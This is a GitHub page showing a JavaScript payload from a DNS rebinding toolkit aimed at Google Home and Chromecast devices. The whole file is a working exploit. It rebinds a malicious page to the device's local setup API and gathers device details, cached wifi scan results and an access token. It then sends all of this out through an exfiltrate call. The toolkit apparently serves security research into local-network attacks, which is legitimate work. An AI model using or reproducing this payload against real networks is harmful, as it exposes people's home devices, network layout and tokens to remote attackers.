dns-rebind-toolkit/payloads/google-home.html at master · Techlord-RCE/dns-rebind-toolkit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<!DOCTYPE html>
<html>
<head>
    <title>Google Home Payload</title>
</head>
<body>
    <script type="text/javascript" src="/share/js/DNSRebindNode.js"></script>
<script type="text/javascript">
(function() {

    // note, Chromecast requires Origin to be unset for GET requests to /setup,
    // however Firefox doesn't allow you to do this with the fetch API, so this exploit
    // doesn't work in firefox.
    attack()
    .then(() => {},
          err => {
              console.error(err)
              DNSRebindNode.emit('fatal', err.message)
          }
    )
    .then(() => DNSRebindNode.destroy())

    async function attack() {

        const getOptions = DNSRebindNode.fetchOptions()

        try {
            const opts = { fetchOptions: getOptions }
            await DNSRebindNode.rebind(`http://${location.host}/setup/eureka_info`, opts)
        } catch (err) {
            return Promise.reject(err)
        }

        const exfiltrationData = {}

        try {
            const params = 'params=version,audio,name,build_info,detail,' +
                           'device_info,net,wifi,setup,settings,opt_in,' +
                           'opencast,multizone,proxy,night_mode_params,' +
                           'user_eq,room_equalizer'

            await Promise.all([
                // get basic device info using the hidden google home API
                request(`http://${location.host}/setup/eureka_info?${params}`, getOptions)
                .then(data => Object.assign(exfiltrationData, data)),

                // get cached wifi network scan info
                request(`http://${location.host}/setup/scan_results`, getOptions)
                .then(data => exfiltrationData.scan_results = data),

                // get a mysterious access token
                request(`http://${location.host}/setup/offer`, getOptions)
                .then(data => exfiltrationData.offer_token = data.token)
            ])
        } catch (err) {
            return Promise.reject(err)
        }

        return await DNSRebindNode.exfiltrate('google-home', exfiltrationData)
    }

    async function request(url, options) {

        let response = null
        try {
            response = await fetch(url, options).then(res => res.json())
        } catch (err) {
            DNSRebindNode.emit('failure', { message: `Error downloading ${url}`, err })
            return Promise.reject(err)
        }

        DNSRebindNode.emit('success', { message: `Downloaded ${url}`, data: response })
        return Promise.resolve(response)
    }
})()
</script>
</body>
</html>